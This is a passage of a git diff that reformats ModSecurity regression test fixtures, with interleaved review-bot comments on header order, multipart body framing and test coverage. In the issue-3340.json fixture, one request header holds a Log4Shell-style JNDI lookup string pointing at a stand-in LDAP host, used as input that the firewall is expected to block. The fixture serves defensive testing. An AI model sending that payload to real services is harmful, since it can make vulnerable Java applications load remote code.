"body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":437, - "error_log":"`Within' with parameter `/name1/' against variable `TX:header_name_name1'" + "expected": { + "error_log": "`Within' with parameter `/name1/' against variable `TX:header_name_name1'", + "http_code": 437 }, - "rules":[ - "SecRuleEngine On", - "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", - "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,capture,chain\"", - "SecRule TX:/^HEADER_NAME_/ \"@within %{tx.restricted_headers}\" \"setvar:'tx.matched=1',log\"" + "rules": [ + "SecRuleEngine On", + "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", + "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,capture,chain\"", + "SecRule TX:/^HEADER_NAME_/ \"@within %{tx.restricted_headers}\" \"setvar:'tx.matched=1',log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - exclusion (8/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - exclusion (8/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + 
"name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", - "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"", - "SecRuleUpdateTargetById 1 !ARGS:/ThIs/" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", + "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"", + "SecRuleUpdateTargetById 1 !ARGS:/ThIs/" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - exclusion/ARGS (9/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - exclusion/ARGS (9/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - 
"method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS|!ARGS:/tHiS/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", - "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS|!ARGS:/tHiS/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", + "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - exclusion/TX (10/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - exclusion/TX (10/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - 
"Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecAction \"phase:1,setvar:'tx.a=10'\"", - "SecRule TX|!TX:/a/ \"10\" \"id:10,deny,status:500\"" + "rules": [ + "SecRuleEngine On", + "SecAction \"phase:1,setvar:'tx.a=10'\"", + "SecRule TX|!TX:/a/ \"10\" \"id:10,deny,status:500\"" ] } ] diff --git a/test/test-cases/regression/issue-2423-msg-in-chain.json b/test/test-cases/regression/issue-2423-msg-in-chain.json index c667de0542..38cb890a30 100644 --- a/test/test-cases/regression/issue-2423-msg-in-chain.json +++ b/test/test-cases/regression/issue-2423-msg-in-chain.json 
@@ -1,124 +1,172 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Test match variable (1/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (1/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "against variable `REQUEST_HEADERS:Transfer-Encoding' .Value: `deflate'" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Transfer-Encoding": "deflate" }, - "uri":"/match-this", - "method":"GET" + "uri": "/match-this", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "against variable `REQUEST_HEADERS:Transfer-Encoding' .Value: `deflate'", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_URI \"^.*$\" \"phase:2,deny,capture,id:1,msg:'MatchedVar On Msg: [%{MATCHED_VAR}]',logdata:'MatchedVar On LogData %{MATCHED_VAR}',chain\"", "SecRule REQUEST_HEADERS \"^.*$\" \"status:437\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Test match variable (2/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (2/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "MatchedVar On Msg: .deflate." 
- }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Transfer-Encoding": "deflate" }, - "uri":"/match-this", - "method":"GET" + "uri": "/match-this", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "MatchedVar On Msg: .deflate.", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_URI \"^.*$\" \"phase:2,deny,capture,id:1,msg:'MatchedVar On Msg: [%{MATCHED_VAR}]',logdata:'MatchedVar On LogData %{MATCHED_VAR}',chain\"", "SecRule REQUEST_HEADERS \"^.*$\" \"status:437\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Test match variable (3/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (3/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "MatchedVar On LogData: deflate" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Transfer-Encoding": "deflate" }, - "uri":"/match-this", - "method":"GET" + "uri": "/match-this", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "MatchedVar On LogData: deflate", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_URI \"^.*$\" \"phase:2,deny,capture,id:1,msg:'MatchedVar On Msg: 
[%{MATCHED_VAR}]',logdata:'MatchedVar On LogData: %{MATCHED_VAR}',chain\"", "SecRule REQUEST_HEADERS \"^.*$\" \"status:437\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Test match variable (4/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (4/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "msg \"Illegal header \\[/restricted/\\]\"" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "Restricted":"attack", - "Other": "Value" + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "Restricted": "attack", + "Other": "Value", + "Content-Length": "0" + }, + "uri": "/", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "msg \"Illegal header \\[/restricted/\\]\"", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"phase:2,setvar:'tx.header_name_%{TX.0}=/%{TX.0}/',deny,t:lowercase,capture,id:500065,msg:'Illegal header [%{MATCHED_VAR}]',logdata:'Restricted header detected: %{MATCHED_VAR}',chain\"", "SecRule TX:/^header_name_/ \"@within /name1/restricted/name3/\" \"status:437\"" diff --git a/test/test-cases/regression/issue-2427.json b/test/test-cases/regression/issue-2427.json index 02f7b16f86..f6bccc65b5 100644 --- a/test/test-cases/regression/issue-2427.json +++ b/test/test-cases/regression/issue-2427.json 
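Review bot: In cases 1/n to 3/n of issue-2423-msg-in-chain.json the added `"Content-Length": "0"` is placed ahead of `"Transfer-Encoding": "deflate"`, while case 4/n and the other fixtures in this diff append it last. The expectations (for example `MatchedVar On Msg: .deflate.`) appear to depend on Transfer-Encoding being the final header the chained rule matches, so the JSON key order is load-bearing and any tool that rewrites these files has to preserve it. JSON has no comments, so I would record this in the title, e.g. `"title": "Test match variable (1/n) - Transfer-Encoding must stay the last request header"`. A request that carries both Content-Length and Transfer-Encoding is also a framing conflict that HTTP parsers handle specially, so confirm the extra header does not change which path these cases exercise.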
@@ -1,55 +1,63 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Tmp file retained for @inspectFile (1/2)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Tmp file retained for @inspectFile (1/2)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "658", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"small2.txt\" ", - "Content-Type: text/plain", - "", - "This is another very small test file that contains the search content abcdef..", - "----------------------------756b6d74fa1a8ee2--" + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + 
"----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"small2.txt\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file that contains the search content abcdef..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "debug_log":"Returning from lua script: abcdef.*Rule returned 1", - "http_code":403 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Returning from lua script: abcdef.*Rule returned 1", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecTmpSaveUploadedFiles On", 
@@ -60,30 +68,30 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Tmp file retained for @inspectFile (2/2)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Tmp file retained for @inspectFile (2/2)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "639", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -105,10 +113,18 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "http_code":200 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecTmpSaveUploadedFiles On", diff --git a/test/test-cases/regression/issue-3340.json b/test/test-cases/regression/issue-3340.json index 6251c860d4..787448acbc 100644 --- a/test/test-cases/regression/issue-3340.json +++ b/test/test-cases/regression/issue-3340.json 
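Review bot: The two cases in issue-2427.json now frame the same multipart request differently. Case 1/2 gains an explicit `\n` on each of its 19 body entries and `"Content-Length": "658"`, while the body entries of case 2/2 are left without any terminator and its header becomes `"Content-Length": "639"`, a difference of exactly 19. If the loader concatenates entries as written (it is not visible in these hunks), case 2/2 reaches the multipart parser as one unbroken line, so its `"http_code": 200` may hold because no part was parsed rather than because @inspectFile found no match. I would give case 2/2 the same `\n` terminators and recompute its length, or say in its title that the unterminated body is intended.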
@@ -16,7 +16,7 @@ "headers": { "Host": "localhost", "User-Agent": "${jndi:ldap://evil.om/w}", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -24,18 +24,24 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, "uri": "/", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8" + "Content-Type": "text/xml; charset=utf-8", + "Content-Length": "0" }, - "body": "OK" + "body": [ + "" + ] }, "expected": { "http_code": 403 diff --git a/test/test-cases/regression/issue-394.json b/test/test-cases/regression/issue-394.json index 82827ac868..0e64fb9968 100644 --- a/test/test-cases/regression/issue-394.json +++ b/test/test-cases/regression/issue-394.json 
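Review bot: The response fixture in issue-3340.json loses its payload: `"body": "OK"` becomes `"body": [ "" ]` with `"Content-Length": "0"`, which changes content rather than formatting. If the old string form was never loaded (the loader is outside this hunk), the new value matches what actually ran and the case never had a response body. Otherwise response-phase processing now sees an empty body. To keep the original intent I would write `"body": [ "OK" ]` with `"Content-Length": "2"`.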
@@ -1,38 +1,44 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Segmentation fault when uploading file with SecStreamInBodyInspection enabled", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/394", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "audit_logs": "", - "debug_logs": "", - "error_logs": "" - }, - "rules": [ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecResponseBodyAccess On" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Segmentation fault when uploading file with SecStreamInBodyInspection enabled", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/394", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecResponseBodyAccess On" + ] + } ] diff --git a/test/test-cases/regression/issue-849.json b/test/test-cases/regression/issue-849.json index 60e0d4e2a4..704ae14665 100644 --- a/test/test-cases/regression/issue-849.json +++ b/test/test-cases/regression/issue-849.json 
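Review bot: The upload path named in the title is never reached by the rewritten case: the request is a bodyless GET with `"uri": ""` and `"Content-Length": "0"`, so the new `"http_code": 200` only shows that an empty transaction completes. A recurrence of the crash on a file upload would not fail this test. If the upload is meant to be covered, the request needs a multipart POST body like the @inspectFile cases elsewhere in this commit; otherwise the title should describe what is checked, for example `"title": "Empty GET with request and response body access enabled"`. The rule list also never sets SecStreamInBodyInspection, which may simply be unsupported in this version.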
@@ -3,8 +3,8 @@ "enabled": 1, "version_min": 209000, "version_max": -1, - "title": "@ipMatch \"Could not add entry\" on slash\/32 notation in 2.9.0 (1/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/849", + "title": "@ipMatch \"Could not add entry\" on slash/32 notation in 2.9.0 (1/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/849", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
@@ -25,33 +25,39 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 }, "rules": [ "SecRuleEngine On", - "SecRule REMOTE_ADDR \"@ipMatch 200.249.12.31\/32\" \"phase:1,nolog,pass,msg:'Localhost connection',id:1,deny,status:403\"" + "SecRule REMOTE_ADDR \"@ipMatch 200.249.12.31/32\" \"phase:1,nolog,pass,msg:'Localhost connection',id:1,deny,status:403\"" ] }, { "enabled": 1, "version_min": 209000, "version_max": -1, - "title": "@ipMatch \"Could not add entry\" on slash\/32 notation in 2.9.0 (2/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/849", + "title": "@ipMatch \"Could not add entry\" on slash/32 notation in 2.9.0 (2/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/849", "client": { "ip": "200.249.12.31", "port": 2313 @@ -64,7 +70,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
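Review bot: The response `Content-Type` value keeps its trailing `\n\r` while the sibling `Content-Length` is cleaned from `length\n\r` to `0`, so the fixture ends up half-normalised. If the control characters are not what the case exercises (the rule shown only inspects REMOTE_ADDR), write `"Content-Type": "text/xml; charset=utf-8"`; if a header value with embedded line breaks is intended, the title should say so, since JSON leaves no room for a comment. The same pair of lines appears in the `@@ -72,18 +78,24 @@` hunk for case 2/2.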
@@ -72,18 +78,24 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 diff --git a/test/test-cases/regression/issue-960.json b/test/test-cases/regression/issue-960.json index 0fdb1ceaca..4b7c56ac7d 100644 --- a/test/test-cases/regression/issue-960.json +++ b/test/test-cases/regression/issue-960.json 
@@ -1,124 +1,137 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "!@within appears to fail (1/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/960", - "gihub_issue": 960, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "!@within appears to fail (1/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/960", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "\\(Rule: 960032\\) .* Rule returned 0.", - "error_log": "" + "http_code": 200 }, - "rules": [ - "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", - "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by 
policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" + "rules": [ + "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", + "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "!@within appears to fail (2/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/960", - "gihub_issue": 960, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "!@within appears to fail (2/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/960", + "client": { + "ip": 
